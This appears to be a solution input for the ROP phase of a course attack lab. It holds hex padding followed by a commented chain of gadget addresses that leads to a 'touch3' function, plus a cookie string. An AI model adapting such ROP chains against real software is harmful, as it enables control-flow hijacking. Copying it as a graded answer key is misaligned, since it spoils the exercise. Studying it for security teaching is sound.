aa aa aa aa aa aa aa aa
aa aa aa aa aa aa aa aa
aa aa aa aa aa aa aa aa
aa aa aa aa aa aa aa aa
aa aa aa aa aa aa aa aa

06 1a 40 00 00 00 00 00   /* mov %rsp to %rax */
c5 19 40 00 00 00 00 00   /* mov %rax to %rdi */

cc 19 40 00 00 00 00 00   /* pop %rax */
50 00 00 00 00 00 00 00   /* offset from %rdi to the string value */

dd 19 40 00 00 00 00 00   /* mov %eax to %edx */
34 1a 40 00 00 00 00 00   /* mov %edx to %ecx */
27 1a 40 00 00 00 00 00   /* mov %ecx to %esi */

d6 19 40 00 00 00 00 00   /* add %rdi, %rsi to %rax */
c5 19 40 00 00 00 00 00   /* mov %rax to %rdi */


fa 18 40 00 00 00 00 00   /* the address of the touch3 function */

aa aa aa aa aa aa aa aa
35 39 62 39 39 37 66 61   /* string value */
